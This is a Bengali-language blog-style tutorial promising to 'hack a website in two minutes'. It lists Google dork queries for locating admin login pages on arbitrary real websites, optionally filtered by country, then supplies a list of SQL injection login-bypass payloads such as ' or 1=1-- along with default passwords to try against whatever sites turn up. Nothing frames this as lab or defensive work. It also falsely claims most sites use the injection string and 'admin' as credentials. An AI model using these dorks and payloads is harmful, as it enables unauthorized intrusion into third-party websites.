কিভাবে একটি ওয়েবসাইট ২ মিনিটে হ্যাক করবেন ?

হ্যাকিং-কে নেশার সাথে তুলনা যায়। হ্যাকিং শিখে কেউ ভালো কাজে ব্যবহার করেন আবার কেউ খারাপ কাজে ব্যবহার করেন। বিষয়টি ঐ ব্যক্তির উপর নির্ভর করবে, আসলে তিনি হ্যাকিং শিখে কি কাজে লাগাতে চান। 

আজকের পোস্টে আমরা দেখবো কিভাবে একটি ওয়েবসাইট এর লগইন প্যানেল বা অ্যাডমিন প্যানেল খুঁজে বের করা লগইন করা যায়। এমন নয় যে এই পদ্ধতি সকল ধরণের ওয়েবসাইট এর ক্ষেত্রে কাজে লাগবে...! এখানে আমাদের বুদ্ধিমত্তার পরিচয় দিতে হবে। মানে মাথার ব্রেইন খাঁটাতে হবে।

চলুন কাজের কোথায় আসি...
প্রথমে আমাদের Google -এ যেতে হবে, গুগল সার্চ ইঞ্জিন এ সার্চ করবো নিচের দেওয়া যে কোনো একটি ডর্ক। নিচের দেওয়া ডর্ক গুলাকে বলা হয় গুগল ডর্ক। গুগল ডর্ক সম্পর্কে আরো বিস্তারিত জানতে হলে কমেন্ট  বক্সে কমেন্ট করে জানাবেন। আমি আপনাদের বুঝার সুবিধার্তে নিচে কিছু sql ইনজেকশন ডর্ক দিয়ে দিয়েছি। 

“inurl:admin.asp” 

“inurl:adminlogin.php”

“inurl:adminhome.php”

“inurl:admin_login.php”

“inurl:admin/login.asp”

“inurl:adminlogin.asp”

“inurl:adminhome.asp”

“inurl:admin_login.asp”

“inurl:administratorlogin.asp”

“inurl:login/administrator.asp”

“inurl:administrator_login.asp”

“inurl:admin.php”

“inurl:login/admin.php”

“inurl:admin/login.php”

“inurl:administratorlogin.php”

“inurl:login/administrator.php”

“inurl:administrator_login.php”

এখান থেকে যে কোনো একটি ডর্ক কপি করুন এবং গুগল সার্চ ইঞ্জিন-এ পেস্ট করুন। তাহলে অনেক গুলা ফলাফল দেখতে পাবেন।

যদি আপনি নির্দিষ্ট কোনো দেশের টা দেখতে চান তাহলে সেই ক্ষেত্রে ডর্ক এর আগে সেই দেশের নাম বসাতে হবে যেমন-    india”inurl:adminlogin.asp”

এখন এখান থেকে যে কোনো একটি ওয়েবসাইটে প্রবেশ করুন। ওয়েবসাইটে প্রবেশ করলে দেখবেন 'Username' এবং 'Password'

এখানে 'Username' দিবেন Admin এবং 'Password' নিচের গুলা। তবে একটা একটা করে দিবেন।

Example

Username: Admin

Password: ' or 'x'='x

Or

Username: admin

Password: ' or 'x'='x

'or'1'='1 admin admin123 admin1234 ' or '1'='1

' or 'x'='x

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1-- 

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 -- 

'or'1=1' 

মনে রাখবেন বেশির ভাগ ওয়েবসাইটের Password এবং Username হয় এটা-

‘or’1=1′ এবং admin

যদি ঐ ওয়েবসাইট Vulnerable হয়ে থাকে তাহলে ঐ ওয়েবসাইট হ্যাক হবে বা এক্সেস নিতে পারবেন।

বিশেষ দ্রষ্টব্যঃ ভুল ত্রুটি হলে ক্ষমার দৃষ্টিতে দেখবেন।